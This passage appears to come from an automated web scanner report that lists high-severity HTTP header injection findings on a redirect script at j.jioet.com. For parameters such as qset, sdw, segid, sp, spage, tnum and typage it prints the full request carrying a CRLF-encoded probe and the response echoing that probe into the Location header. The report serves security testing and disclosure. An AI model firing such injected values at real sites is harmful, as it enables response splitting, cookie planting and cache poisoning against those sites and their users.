Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:53 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk144110218044853860ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:53 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&a2fcc
89eed5f8dfa
=1&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=144110218044853860&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1145

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.12. http://j.jioet.com/cgi/r [qset parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the qset request parameter is copied into the Location response header. The payload 165e5%0d%0ac319200ce11 was submitted in the qset parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=165e5%0d%0ac319200ce11&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:23 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qlwqABU0AAEag7Fk; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:23 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:23 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk226110218044823403ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:23 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=165e5
c319200ce11
&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=226110218044823403&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1128

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.13. http://j.jioet.com/cgi/r [sdw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the sdw request parameter is copied into the Location response header. The payload a6faf%0d%0ad11408052f1 was submitted in the sdw parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=a6faf%0d%0ad11408052f1&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:32 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qoAqABU0AAATqg@Y; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:32 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:32 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk682110218044832619ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:32 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=a6faf
d11408052f1
&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=682110218044832619&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1124

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.14. http://j.jioet.com/cgi/r [segid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the segid request parameter is copied into the Location response header. The payload 7302f%0d%0a96d19307f57 was submitted in the segid parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=7302f%0d%0a96d19307f57&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:29 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qnQqABU0AAARjeww; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:29 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:29 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk122110218044829024ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:29 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=7302f
96d19307f57
&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=122110218044829024&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.15. http://j.jioet.com/cgi/r [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the sp request parameter is copied into the Location response header. The payload c97c6%0d%0af89b2e971c3 was submitted in the sp parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=c97c6%0d%0af89b2e971c3&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:37 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qpQqABU0AAFtCp4E; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:37 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:37 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk734110218044837517ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:37 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=c97c6
f89b2e971c3
&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=734110218044837517&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1134

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.16. http://j.jioet.com/cgi/r [spage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the spage request parameter is copied into the Location response header. The payload ac9b5%0d%0a7aa82c9df45 was submitted in the spage parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=ac9b5%0d%0a7aa82c9df45&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:14 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qjgqABU0AAASGvC4; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:14 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:14 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk902110218044814004ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:14 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=ac9b5
7aa82c9df45
&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=902110218044814004&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.17. http://j.jioet.com/cgi/r [tnum parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the tnum request parameter is copied into the Location response header. The payload 87307%0d%0a1ff0f4663d8 was submitted in the tnum parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=87307%0d%0a1ff0f4663d8&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:41 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qbQqABU0AAHAbVFY; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:47:41 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:47:41 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk153110218044741583ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:41 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=87307
1ff0f4663d8
&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=153110218044741583&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1137

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.18. http://j.jioet.com/cgi/r [typage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the typage request parameter is copied into the Location response header. The payload 30b9d%0d%0ad888947672d was submitted in the typage parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=30b9d%0d%0ad888947672d&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:11 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qiwqABU0AAFs3VGE; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:11 GMT
Connection: close
Pragma: no-cache
